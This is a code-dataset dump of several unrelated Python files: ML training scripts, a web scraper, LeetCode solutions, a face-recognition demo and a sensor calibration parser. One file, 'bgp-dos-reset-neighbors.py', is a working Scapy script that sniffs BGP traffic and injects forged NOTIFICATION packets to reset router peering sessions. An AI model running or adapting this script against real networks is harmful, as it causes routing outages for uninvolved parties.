result\n","sub_path":"LeetCode/Solved/oj179.py","file_name":"oj179.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"423396729","text":"#!/usr/bin/env python3\n#Import time so we can set a sleep timer\nimport time\n#Import scapy\nfrom scapy.all import *\n#Import BGP\nload_contrib('bgp')\n\n#Loop to sniff packets\nfor i in range (0, 5):\n #Sniff for a BGP packet - change IP address to the right IP address\n pkt = sniff(filter=\"tcp and ip dst 192.168.1.249\",count=1)\n\n for i in range (0, 10):\n #Create a new Ethernet frame\n frame1=Ether()\n #Set destination MAC address to captured BGP frame\n frame1.dst = pkt[0].dst\n #Set source MAC address to captured BGP frame\n frame1.src = pkt[0].src\n #Set Ethernet Type to captured BGP frame\n frame1.type = pkt[0].type\n #Set destination port to captured BGP packet TCP port number\n mydport = pkt[0].dport\n #Set source port to captured BGP packet TCP port number\n mysport = pkt[0].sport\n #Set sequence number to captured BGP packet + i (loop value)\n seq_num = pkt[0].seq + i\n #Set ack number to captured BGP packet \n ack_num = pkt[0].ack\n #Set source IP address to captured BGP packet \n ipsrc = pkt[0][IP].src\n #Set desination IP address to captured BGP packet \n ipdst = pkt[0][IP].dst\n #Craft notification BGP packet. Type 3 is notification. Marker is a bunch of F's in hex \n bgp_reset = IP(src=ipsrc, dst=ipdst, ttl=1)\\\n /TCP(dport=mydport, sport=mysport, flags=\"PA\", seq=seq_num, ack=ack_num)\\\n /BGPHeader(marker=340282366920938463463374607431768211455, len=21,\\\n type=3)\n #Send packet into network = frame1 + bgp_reset\n sendp(frame1/bgp_reset)\n frame1.show()\n bgp_reset.show()\n time.sleep(1)\n\n\n","sub_path":"bgp-dos-reset-neighbors.py","file_name":"bgp-dos-reset-neighbors.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"131698732","text":"import numpy as np\nfrom skimage.measure import structural_similarity as ssim\n\n\ndef mse(imageA, imageB):\n # the 'Mean Squared Error' between the two images is the\n # sum of the squared difference between the two images;\n # NOTE: the two images must have the same dimension\n err = np.sum((imageA.astype(\"float\") - imageB.astype(\"float\")) ** 2)\n err /= float(imageA.shape[0] * imageA.shape[1])\n err = (err*100)/65025\n # return the MSE, the lower the error, the more \"similar\"\n # the two images are\n return err\n\ndef compare_images(imageA, imageB):\n # compute the mean squared error and structural similarity\n # index for the images\n m = mse(imageA, imageB)\n s = ssim(imageA, imageB)\n\n return round(m,2), round(s,2)","sub_path":"Source/ssim/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"613070207","text":"import argparse\nimport numpy as np\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom torchvision.datasets import MNIST\nfrom torchvision.transforms import transforms\nfrom torchvision.utils import save_image\n\ntorch.manual_seed(123)\n\nparser = argparse.ArgumentParser(description='PyTorch MNIST AAE')\n\nparser.add_argument('--batch-size', type=int, default=100, metavar='N',\n help='input batch size for training (default: 100)')\nparser.add_argument('--epochs', type=int, default=50, metavar='N',\n help='number of epochs to train (default: 10)')\n\nargs = parser.parse_args()\n\nX_dim = 28 ** 2\nh_dim = 1000\nz_dim = 2\nEPSILON = 1e-15\n\ntrainset = MNIST(root='./data/',\n train=True,\n transform=transforms.ToTensor(),\n download=False)\n\ntestset = MNIST(root='./data/',\n train=False,\n transform=transforms.ToTensor(),\n download=False)\n\ntrain_loader = DataLoader(dataset=trainset,\n batch_size=args.batch_size,\n shuffle=True)\n\ntest_loader = DataLoader(dataset=testset,\n batch_size=args.batch_size,\n shuffle=False)\n\nclass Q_net(nn.Module):\n def __init__(self):\n super(Q_net, self).__init__()\n self.lin1 = nn.Linear(X_dim, h_dim)\n self.lin2 = nn.Linear(h_dim, h_dim)\n self.lin3gauss = nn.Linear(h_dim, z_dim)\n def forward(self, x):\n x = F.dropout(self.lin1(x), p=0.25, training=self.training)\n x = F.relu(x)\n x = F.dropout(self.lin2(x), p=0.25, training=self.training)\n x = F.relu(x)\n xgauss = self.lin3gauss(x)\n return xgauss\n\nclass P_net(nn.Module):\n def __init__(self):\n super(P_net, self).__init__()\n self.lin1 = nn.Linear(z_dim, h_dim)\n self.lin2 = nn.Linear(h_dim, h_dim)\n self.lin3 = nn.Linear(h_dim, X_dim)\n def forward(self, x):\n x = self.lin1(x)\n x = F.dropout(x, p=0.25, training=self.training)\n x = F.relu(x)\n x = self.lin2(x)\n x = F.dropout(x, p=0.25, training=self.training)\n x = self.lin3(x)\n return F.sigmoid(x)\n\nclass D_net(nn.Module):\n def __init__(self):\n super(D_net, self).__init__()\n self.lin1 = nn.Linear(z_dim, h_dim)\n self.lin2 = nn.Linear(h_dim, h_dim)\n self.lin3 = nn.Linear(h_dim, 1)\n def forward(self, x):\n x = F.dropout(self.lin1(x), p=0.2, training=self.training)\n x = F.relu(x)\n x = F.dropout(self.lin2(x), p=0.2, training=self.training)\n x = F.relu(x)\n return F.sigmoid(self.lin3(x))\n\nQ, P, D = Q_net(), P_net(), D_net()\nQ.train()\nP.train()\nD.train()\n\n# Optimizers\nP_optim = optim.Adam(P.parameters(), lr = 0.001)\nQ_enc_optim = optim.Adam(Q.parameters(), lr = 0.001)\nQ_gen_optim = optim.Adam(Q.parameters(), lr = 0.001)\nD_optim = optim.Adam(D.parameters(), lr = 0.001)\n\nfor epoch in range(args.epochs):\n step = 0\n for i, (images, _) in enumerate(train_loader):\n P.zero_grad()\n Q.zero_grad()\n D.zero_grad()\n\n images = Variable(images)\n batch_size = images.size()[0]\n images = images.view(batch_size, -1)\n\n z_sample = Q(images)\n x_sample = P(z_sample)\n recon_loss = F.binary_cross_entropy(x_sample + EPSILON, images + EPSILON)\n recon_loss.backward()\n\n P_optim.step()\n Q_enc_optim.step()\n\n Q.eval()\n z_real_gauss = Variable(torch.randn(images.size()[0], z_dim) * 5.)\n D_real_gauss = D(z_real_gauss)\n\n z_fake_gauss = Q(images)\n D_fake_gauss = D(z_fake_gauss)\n\n D_loss = -torch.mean(torch.log(D_real_gauss + EPSILON) + torch.log(1 - D_fake_gauss + EPSILON))\n D_loss.backward()\n D_optim.step()\n\n Q.train()\n z_fake_gauss = Q(images)\n D_fake_gauss = D(z_fake_gauss)\n\n G_loss = -torch.mean(torch.log(D_fake_gauss + EPSILON))\n G_loss.backward()\n Q_gen_optim.step()\n\n step += 1\n\n if (step + 1) % 100 == 0:\n print(\"Epoch: %d, Step: [%d/%d], Reconstruction Loss: %.4f, Discriminator Loss: %.4f, Generator Loss: %.4f\" %\n (epoch + 1, step + 1, len(train_loader), recon_loss.data[0], D_loss.data[0], G_loss.data[0]))\n\n P.eval()\n z1 = np.arange(-10, 10, 2.).astype('float32')\n z2 = np.arange(-10, 10, 2.).astype('float32')\n nx, ny = len(z1), len(z2)\n recons_image = []\n\n for z1_ in z1:\n for z2_ in z2:\n x = P(Variable(torch.from_numpy(np.asarray([z1_, z2_]))).view(-1, z_dim)).view(1, 1, 28, 28)\n recons_image.append(x)\n\n if not os.path.isdir('./data/reconst_images'):\n os.makedirs('data/reconst_images')\n save_image(recons_image.data, './data/reconst_images/aae_images_%d.png' % (epoch+1), nrow=nx)\n","sub_path":"aae.py","file_name":"aae.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"501093813","text":"import requests\r\n\r\nheaders = {'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36'} \r\nbase_url = \"http://httpbin.org/get\"\r\nproxies = {\r\n 'http':'socks5://127.0.0.1:1091',\r\n 'https':'socks5://127.0.0.1:1091'\r\n}\r\n\r\ntry:\r\n html = requests.get(base_url,headers=headers,proxies=proxies,timeout=5) # 发送请求\r\n print(html.text)\r\n html.close()#用在请求后面\r\nexcept:\r\n print('不行')\r\n \r\n","sub_path":"05.【反反爬】代理/2.socks5.py","file_name":"2.socks5.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"421617876","text":"import requests\nimport lxml\nfrom bs4 import BeautifulSoup\n\nurl =\"https://www.amazon.com/Instant-Pot-Duo-Evo-Plus/dp/B07W55DDFB/ref=sr_1_1?qid=1597662463\"\n\nheader = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\",\n \"Accept-Language\": \"en-US,en;q=0.9\"\n}\nresponse = requests.get(url, headers=header)\n\nsoup = BeautifulSoup(response.content, \"lxml\")\n\n# print(soup.prettify())\n\nprice = soup.find(id=\"priceblock_ourprice\").get_text()\nprice_without_currency = price.split(\"$\")[1]\nprice_as_float = float(price_without_currency)\nprint(price_as_float)\n\n# To send notification to your email\nimport smtplib\n\ntitle = soup.find(id=\"productTitle\").get_text().strip()\nprint(title)\n\nBUY_PRICE = 200\n\nif price_as_float < BUY_PRICE:\n message = f\"{title} is now {price}\"\n\n with smtplib.SMTP(YOUR_SMTP_ADDRESS, port=587) as connection:\n connection.starttls()\n result = connection.login(YOUR_EMAIL, YOUR_PASSWORD)\n connection.sendmail(\n from_addr=YOUR_EMAIL,\n to_addrs=YOUR_EMAIL,\n msg=f\"Subject:Amazon Price Alert!\\n\\n{message}\\n{url}\"\n )\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"215028130","text":"\"\"\"\nhttps://leetcode.com/explore/challenge/card/june-leetcoding-challenge/541/week-3-june-15th-june-21st/3366/\nThe set [1,2,3,...,n] contains a total of n! unique permutations.\n\nBy listing and labeling all of the permutations in order, we get the following sequence for n = 3:\n\n\"123\"\n\"132\"\n\"213\"\n\"231\"\n\"312\"\n\"321\"\nGiven n and k, return the kth permutation sequence.\n\nNote:\n\nGiven n will be between 1 and 9 inclusive.\nGiven k will be between 1 and n! inclusive.\nExample 1:\n\nInput: n = 3, k = 3\nOutput: \"213\"\nExample 2:\n\nInput: n = 4, k = 9\nOutput: \"2314\"\n\"\"\"\n\n\nclass Solution:\n def getPermutation(self, n: int, k: int) -> str:\n factorial = [1]\n numbers = [1]\n i = 1\n while i < n:\n numbers.append(i + 1)\n a = factorial.pop(len(factorial) - 1)\n factorial.append(a)\n factorial.append(a * i)\n i += 1\n i = 1\n str_n = 0\n k -= 1\n while i <= n:\n index = int(k / factorial[n - i])\n str_n = 10 * str_n + numbers[index]\n numbers.remove(numbers[index])\n k %= factorial[n - i]\n i += 1\n return str(str_n)\n\n\n# Main Call\nsolution = Solution()\nn = 3\nk = 3\nprint(solution.getPermutation(n, k))\nn = 4\nk = 9\nprint(solution.getPermutation(n, k))\n","sub_path":"src/integers/getPermutation.py","file_name":"getPermutation.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"576128900","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom sklearn.metrics import matthews_corrcoef, accuracy_score, precision_score, recall_score, roc_auc_score, average_precision_score\nfrom sklearn.metrics import confusion_matrix as sk_conf\nfrom sklearn.metrics import roc_curve as sk_roc_curve\nfrom sklearn.metrics import precision_recall_curve as sk_precrec\n\nfrom statsmodels.tsa.stattools import grangercausalitytests\n\nfrom matplotlib.cm import seismic\n\n\ndef scores(y_true, y_pred, y_prob):\n mcc = matthews_corrcoef(y_true, y_pred)\n acc = accuracy_score(y_true, y_pred)\n\n global_scores = pd.DataFrame({\"matthews\": [mcc],\n \"accuracy\": [acc]\n })\n\n for class_, true_class_, pred_class_, prob_class_ in walk_classes(y_true, y_pred, y_prob):\n tp, fn, fp, tn = sk_conf(true_class_, pred_class_).flatten()\n class_prec = precision_score(true_class_, pred_class_)\n class_rec = recall_score(true_class_, pred_class_)\n class_auroc = roc_auc_score(true_class_, prob_class_)\n\n class_scores = pd.DataFrame({f\"class_{class_}_tp\": [tp],\n f\"class_{class_}_fp\": [fp],\n f\"class_{class_}_fn\": [fn],\n f\"class_{class_}_tn\": [tn],\n f\"class_{class_}_precision\": [class_prec],\n f\"class_{class_}_recall\": [class_rec],\n f\"class_{class_}_auroc\": [class_auroc]\n })\n\n global_scores = pd.concat([global_scores, class_scores], axis=1)\n\n return global_scores\n\ndef pr_curve(y_true, y_pred, y_prob, plot=True):\n if plot:\n fig, ax = plt.subplots(figsize=(5, 4))\n ax.set_title(\"PR-curve\")\n ax.set_xlabel(\"recall\")\n ax.set_ylabel(\"precision\")\n\n for class_, true_class_, pred_class_, prob_class_ in walk_classes(y_true, y_pred, y_prob):\n class_prec_, class_rec_, _ = sk_precrec(true_class_, prob_class_)\n\n if plot:\n pos = sum(true_class_) / len(true_class_)\n line, = ax.plot([0,1],[pos, pos], linestyle=\"dotted\")\n ap = round(average_precision_score(true_class_, prob_class_), 3)\n ax.plot(class_rec_, class_prec_, label=f\"pos label: {class_}; AP: {ap}\", color=line.get_color())\n\n if plot:\n ax.legend(loc=\"lower left\")\n return\n\ndef roc_curve(y_true, y_pred, y_prob, plot=True):\n if plot:\n fig, ax = plt.subplots(figsize=(5,4))\n ax.set_title(\"ROC-curve\")\n ax.set_xlabel(\"false positive rate\")\n ax.set_ylabel(\"true positive rate\")\n ax.plot([0,1],[0,1], label=\"no skill\", color=\"k\", linestyle=\"dotted\")\n\n for class_, true_class_, pred_class_, prob_class_ in walk_classes(y_true, y_pred, y_prob):\n class_fpr_, class_tpr_, _ = sk_roc_curve(true_class_, prob_class_)\n\n if plot:\n auroc = round(roc_auc_score(true_class_, prob_class_), 3)\n ax.plot(class_fpr_, class_tpr_, label=f\"pos label: {class_}; AUROC: {auroc}\")\n\n if plot:\n ax.legend(loc=\"lower right\")\n return\n\ndef walk_classes(y_true, y_pred, y_prob):\n classes = np.unique(y_true).astype(int)\n n_classes = len(classes)\n\n for class_ in classes:\n true_class_ = (y_true == class_).astype(int)\n pred_class_ = (y_pred == class_).astype(int)\n prob_class_ = y_prob[:, class_]\n yield class_, true_class_, pred_class_, prob_class_\n\ndef confusion(y_true, y_pred, plot=True):\n conf = sk_conf(y_true, y_pred, normalize=\"true\")\n\n if plot:\n fig, ax = plt.subplots(figsize=(5, 4))\n sns.heatmap(conf, annot=True, cmap=seismic)\n ax.set_xlabel(\"prediction\")\n ax.set_ylabel(\"true label\")\n\n return conf\n\ndef causality(cause, effect, max_lag=25, sample_frequency=\"5min\", plot=True):\n combined = pd.DataFrame(effect.rename(\"effect\")).join(cause.rename(\"cause\"), how=\"right\")\n if sample_frequency is not None:\n combined = combined.resample(sample_frequency).last().dropna()\n\n cols = [\"ssr_ftest\", \"ssr_chi2test\", \"lrtest\"]\n ret = grangercausalitytests(combined, maxlag=max_lag, verbose=False)\n evaluation = [[ret[lag][0][col][1] for lag in range(1, max_lag + 1)] for col in cols]\n evaluation = pd.DataFrame(data=evaluation, index=cols).T.set_index(np.arange(1, max_lag + 1))\n\n if plot:\n fig, ax = plt.subplots(figsize=(18,5))\n evaluation.plot(ax=ax)\n\n return evaluation, combined\n\n########################################################################################################################\n\n\n\n\n\n\n\n\n","sub_path":"modeling/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"483993183","text":"from random import *\nimport string\nfrom time import sleep\nimport os\nimport errno\n\n\n# simple program to write to files randomly to be picked up by Spark Streaming\ndef write_to_file(path, n_lines, max_length):\n with open(path, \"w\") as file:\n for i in range(n_lines):\n rand_string = \"\".join(choice(string.ascii_letters) for _ in range(randint(1, max_length)))\n file.write(rand_string)\n file.write(\"\\n\")\n sleep(random() / 3)\n\n\ndef write_random_files(dir_path, n_files, n_lines, max_length):\n if not os.path.exists(dir_path):\n try:\n os.makedirs(dir_path)\n except OSError as exc:\n if exc.errno != errno.EEXIST:\n raise\n\n for i in range(n_files):\n write_to_file(dir_path + \"/file_\" + str(i) + \".txt\", n_lines, max_length)\n sleep(random())\n\n\nif __name__ == '__main__':\n write_random_files(\"../dumped-data/watched-files\", 5, 2, 20)\n","sub_path":"utils/write-randomly-to-files.py","file_name":"write-randomly-to-files.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"150745800","text":"def reemplaza_primera(cadena):\n \"\"\"\n Reemplaza todas las apariciones de la primer letra de la cadena por ?\n :param cadena: de caracteres\n :return: una nueva cadena producto de aplicar las transformaciones. Si se ingresa\n una cadena vacia , se devuelve una nueva con un solo ?\n \"\"\"\n\n if len(cadena) == 0:\n return '?'\n\n primera = cadena[0].lower()\n aux = ''\n\n for letra in cadena:\n if letra.lower() == primera:\n aux += '?'\n else:\n aux += letra\n\n return aux\n\n\n# ejecucion\ningreso = input(\"ingrese una cadena...\")\ningreso_transformado = reemplaza_primera(ingreso)\nprint(f\"Usted ingresó:\\n {ingreso}\\n Transformada queda como:\\n {ingreso_transformado}\")\n","sub_path":"Parcialitos/Primero/reemplaza_primera.py","file_name":"reemplaza_primera.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"567041135","text":"#include \nimport cv2\nimport numpy as np\nfrom PIL import Image\n\noriginal_img = cv2.imread('alph.png')\noriginal_img=original_img[int(len(original_img)/5)*4:int(len(original_img)/5)*5,:]\nB, G, R = cv2.split(original_img) #get the bull channel (because the line is blue)\nimg = original_img\nline=13\n_,cleanBlue = cv2.threshold(B,100,255,cv2.THRESH_BINARY) #get rid of blue line by setting\nridfuzz= cv2.dilate(cleanBlue,None,iterations=1) #erode to get rid of fuzz\nridfuzz2= cv2.erode(ridfuzz,None,iterations=1)\nerode = cv2.erode(ridfuzz2,None,iterations=2) #dialate to fill the gap caused by blue line\ndilated = cv2.dilate(erode,None,iterations=2) #膨胀图像\nres = cv2.resize(dilated,(300*line, 300),\n interpolation = cv2.INTER_CUBIC) ##turn the image into 10*16*16\n #cv2.imshow(\"original_img\", res) #\n#cv2.imshow(\"B_channel_img\", img) #\n#cv2.imshow(\"RidBlue\", cleanBlue) #\n#cv2.imshow(\"ridfuzz2\", ridfuzz2) #\n#cv2.imshow(\"erode\", erode) #\ncv2.imshow(\"Dilated Image\",dilated) #\ncv2.imshow(\"Image\",res) #\ncv2.waitKey(0)\ncv2.destroyAllWindows()\nprint(len(res))\nprint(len(res[0]))\nfor i in range(len(res[0])): #turn the picture binary again\n\tfor j in range(len(res)):\n\t\tif res[j][i]>=100:\n\t\t\tres[j][i]=255\n\t\telse:\n\t\t\tres[j][i]=0\nprint(res)\nprint(res[10])\nline=13\nfor i in range(line):\n\ta=res[:,int(len(res[0])/line)*i:int(len(res[0])/line)*(i+1)]\n\tname=str(i+line*4) + \".png\"\n\tcv2.imwrite(name,a)","sub_path":"assignment2/bigpic/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"244608010","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('location//', views.location, name='place'),\n path('character//', views.character, name='character'),\n path('episode//', views.episode, name='episode'),\n path('location/', views.not_found, name='not_found'),\n path('search/', views.search, name='search'),\n]","sub_path":"Tarea1_API/ram/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"377755973","text":"\"\"\"\nreferences : https://www.cs.cmu.edu/~rsalakhu/papers/oneshot1.pdf\n\"\"\"\nfrom keras.models import load_model\n\n# model = load_model(\"C:/Users/phani/Downloads/Colab Archive/siamese_net_bce.h5\", compile=False)\nmodel = load_model(\"C:/Users/phani/Downloads/siamese_net_bce_v2.h5\", compile=False)\n\n\nimport os\nimport face_recognition\nimport cv2\nimport numpy as np\nimport pickle\n\nKNOWN_FACES_DIR = \"known_faces\" \nUNKNOWN_FACES_DIR = \"unknown_faces\"\nFRAME_THICKNESS = 3\nFONT_THICKNESS = 2\nMODEL = \"hog\" #cnn\nIMAGE_SIZE = 96\n\ndef zscore(x):\n\tmean = np.mean(x)\n\tstd = np.std(x)\n\tstd_adj = np.maximum(std, 1.0 / np.sqrt(x.size))\n\ty = np.multiply(np.subtract(x, mean), 1 / std_adj)\n\treturn y\n\n# print(\"fetching encodings and labels\")\n\n# pickle_in1 = open(\"encodings/known_faces.pickle\",\"rb\")\n# known_faces = pickle.load(pickle_in1)\n\n# pickle_in2 = open(\"encodings/known_names.pickle\",\"rb\")\n# known_names = pickle.load(pickle_in2)\n\nprint(\"fetching encodings and labels\")\n\npickle_in1 = open(\"encodings/known_faces2.pickle\",\"rb\")\nknown_faces = pickle.load(pickle_in1)\n\npickle_in2 = open(\"encodings/known_names2.pickle\",\"rb\")\nknown_names = pickle.load(pickle_in2)\n\n\nprint(\"processing Video\")\n#test_video, VID_20200318_092439, excelsior, L_P, BBT2, *VID_20200322_120551, VID_20200322_115721\nvideo = cv2.VideoCapture('test_videos/test_video.mp4')\ncount = 0\nwhile True:\n\tret, image = video.read()\n\timage = cv2.resize(image, (640, 360))\n\n\tif not ret:\n\t\tbreak\n\n\tlocations = face_recognition.face_locations(image, model=MODEL)\n\tencodings = []\n\tfor top, right, bottom, left in locations:\n\t\timg = cv2.resize(np.array(image[top:bottom ,left:right]),(IMAGE_SIZE, IMAGE_SIZE))\n\t\timg = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\t\timg = np.expand_dims(img, axis=0)\n\t\timg = np.expand_dims(img, axis=-1)\n\t\tencodings.append(model.predict(zscore(img)))\n\t\n\tfor face_encoding, face_location in zip(encodings, locations):\n\t\tresults = [np.sqrt(np.sum(np.square(known_faces[i]-face_encoding))) for i in range(len(known_faces))]\n\t\tmatch = known_names[results.index(min(results))]\n\t\tprint(f\"Match found: {match},{min(results)}\")\n\t\t# top_left = (face_location[3], face_location[0])\n\t\t# bottom_right = (face_location[1], face_location[2])\n\t\tcolor = [0, 255, 0]\n\t\t# cv2.rectangle(image, top_left, bottom_right, color, FRAME_THICKNESS)\n\t\ttop_left = (face_location[3], face_location[2])\n\t\tbottom_right = (face_location[1], face_location[2]+22)\n\t\tif min(results) < 15:\t\t\t\t\n\t\t\tcv2.rectangle(image, top_left, bottom_right, color, cv2.FILLED)\n\t\t\tcv2.putText(image, match, (face_location[3]+10, face_location[2]+15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), FONT_THICKNESS)\n\tcount += 5\n\tvideo.set(1, count)\n\tcv2.imshow(\"TV\", image)\n\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\tbreak\ncv2.destroyAllWindows()","sub_path":"face_recognition_bce_video.py","file_name":"face_recognition_bce_video.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"174046922","text":"import os\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib import parse\n\n\nclass Webtoon:\n \"\"\"\n method 1개\n 기본정보\n \"\"\"\n def __init__(self):\n self.name = None\n self.webtoon_id = None\n self.title = None\n self.author = None\n self.description = None\n self.get_url = None\n\n def get_url(self):\n file_path = 'data/webtoon_page.html'\n webtoon_page_url = 'http://comic.naver.com/webtoon/list.nhn?'\n params = {\n 'titleId': self.webtoon_id\n }\n\n if os.path.exists(file_path):\n html = open(file_path, 'rt').read()\n else:\n response = requests.get(webtoon_page_url, params)\n html = response.text\n open(file_path, 'wt').write(html)\n return html\n\n def get_info(self):\n soup = BeautifulSoup(self.get_url(), 'lxml')\n h2_title = soup.select_one('div.detail > h2')\n title = h2_title.contents[0].strip()\n author = h2_title.contents[1].get_text(strip=True)\n description = soup.select_one('div.detail > p').get_text(strip=True)\n\n print(title)\n print(author)\n print(description)\n webtoon_info = Episode(\n title=title,\n author=author,\n description=description,\n )\n\n\nclass Episode:\n \"\"\"\n Webtoon에서 인스턴스로 받아와서\n 웹툰명, url\n \"\"\"\n def __init__(self, title, author, description):\n self.title = title\n self.author = author\n self.description = description\n self.url = None\n # 크롤러가 crawler.py에서 입력받은 정보를 받아올수 있게 하자!!\n self.webtoon_id = None\n\n # Webtoon에서 받은 기본 정보와 그리고 이 클라스에서 받게될 정보를 이용해서 하자.\n\n def get_detail_info(self):\n # request를 이용해 정보가 없음 가지고 온다.\n file_path = 'data/webtoonhome.html'\n params = {\n 'titleId': self.webtoon_id\n }\n webtoon_episode_url = 'http://comic.naver.com/webtoon/list.nhn?'\n if os.path.exists(file_path):\n open(file_path, 'rt')\n else:\n response = requests.get(webtoon_episode_url, params)\n html = response.text\n open(file_path, 'wt').write(html)\n # urllib에서 parse를 임포트해와서 합쳐줘서 출력한다.\n url = webtoon_episode_url + parse.urlencode(params)\n\n print(self.title)\n print(self.author)\n print(self.description)\n print(url)\n\n\nclass EpisodeImage:\n \"\"\"\n 에피소드\n url\n file_path 표시\n \"\"\"\n\n\n\nclass Connection:\n def __init__(self, what_user_want):\n self.what_user_want = what_user_want","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"280962674","text":"import sys\nimport csv\nfrom datetime import datetime as dt\nimport json\nimport numpy as np\n\n# Limit display of floats to 8 decimal places and suppress sci notation\nnp.set_printoptions(precision=8, suppress=True)\n\nimport tkinter as tk\nfrom tkinter import filedialog\n\nroot = tk.Tk()\nroot.withdraw()\n\n##\n## Constants\n## =========\nLOWER_WL_LIMIT = 217.0 # constant\nUPPER_WL_LIMIT = 240.0 # constant\n\n##\n## Function definitions\n## ====================\ndef get_user(prompt, response_type):\n \"\"\"\n Bare bones user input validation. If string, must not be empty.\n If integer or float, must actually be (or be converted to) that.\n Also handles simple Y or N with defaults.\n\n prompt - Text to display as user prompt\n response_type - str, defaultY, defaultN, int or float\n \"\"\"\n while True:\n response = input(prompt)\n if response_type == \"str\":\n if not response:\n print(\"Whoa! You didn't enter anything.\")\n continue\n elif response_type == \"defaultY\":\n if not response in \"YyNn\":\n print(\"Whoa! That's not a valid answer.\")\n continue\n elif response in \"Yy\":\n return True\n else:\n return False\n elif response_type == \"defaultN\":\n if not response in \"YyNn\":\n print(\"Whoa! That's not a valid answer.\")\n continue\n elif response in \"Nn\":\n return False\n else:\n return True\n elif response_type ==\"int\":\n try:\n response = int(response)\n except ValueError:\n print(\"Whoa! That's not a number.\")\n continue\n elif response_type ==\"float\":\n try:\n response = float(response)\n except ValueError:\n print(\"Whoa! That's not a number.\")\n continue\n return response\n\ndef reader_checks_passed(*args):\n \"\"\"\n Simple tests for successful parsing of cal file.\n\n args - all fields parsed from the input file. First two will be\n srting, rest are lists.\n \"\"\"\n # check if any fields are empty...\n if not all(arg for arg in args):\n return False\n # check if lists are different length...\n if not all(len(arg) == len(args[2]) for arg in args[3:]):\n return False\n # checks passed...\n return True\n \ndef load_cal_file():\n \"\"\"\n Reads a vendor cal file and returns the desired values. Prompts\n user for input file.\n \"\"\"\n wl = [] # wavelength bins\n eno3 = [] # nitrate extinction coefficients\n eswa = [] # seawater extinction coefficients\n di = [] # deionized water reference spectra\n\n cal_temp = \"\"\n\n filedate = \"\"\n\n while True:\n # Prompt user to select the source cal file...\n infile = filedialog.askopenfilename(title=\"Select the instrument calibration file...\")\n if not infile:\n if not get_user(\"Would you like to cancel? Enter Y or [N]... \", \"defaultN\"):\n continue\n else:\n return False\n \n # Open the file and parse out the needed values. If the file\n # format ever changes, or the corrupt, this may do some\n # unexpected things...\n with open(infile, \"r\") as csv_in:\n reader = csv.reader(csv_in)\n # Read file row by row...\n for row in reader:\n # NUTNR cal files may have multiple creation dates in\n # the header. The first one denotes the most recent\n # calibration update, and is the one we want...\n if \"creation time\" in row[1] and not filedate:\n filedate = dt.strptime(row[1][19:], \"%d-%b-%Y %H:%M:%S\")\n # Find the calibration temperature...\n elif row[1].startswith(\"T_CAL_SWA\"):\n cal_temp = row[1][10:].strip()\n # Rows beginning with E contain the values we seek...\n elif row[0] == \"E\":\n wl.append(float(row[1]))\n eno3.append(float(row[2]))\n eswa.append(float(row[3]))\n di.append(float(row[5]))\n\n # Do a few checks on the parsed values...\n if reader_checks_passed(cal_temp, filedate, wl, eno3, eswa, di):\n # Checks passed, return our values...\n return cal_temp, filedate, wl, eno3, eswa, di\n else:\n # Checks failed, user can try again or cancel...\n print(\"Whoa! I couldn't parse that file.\")\n if get_user(\"Would you like to select another calibration file? Enter [Y] or N... \", \"defaultY\"):\n # User wants to try again...\n continue\n else:\n # User cancels...\n return False\n\ndef save_cal_file(cal_data, serial_number, lwl, uwl):\n \"\"\"\n Writes calibration data to a new file in the required format. Prompts\n user for output file.\n\n cal_data - tuple returned by load_cal_file()\n serial_number - user-provided string\n lwl - lower wl limit CONSTANT\n uwl - upper wl limit CONSTANT\n \"\"\"\n cal_temp, filedate, wl, eno3, eswa, di = cal_data\n\n fname_sn = serial_number[-4:].zfill(5)\n fname_date = 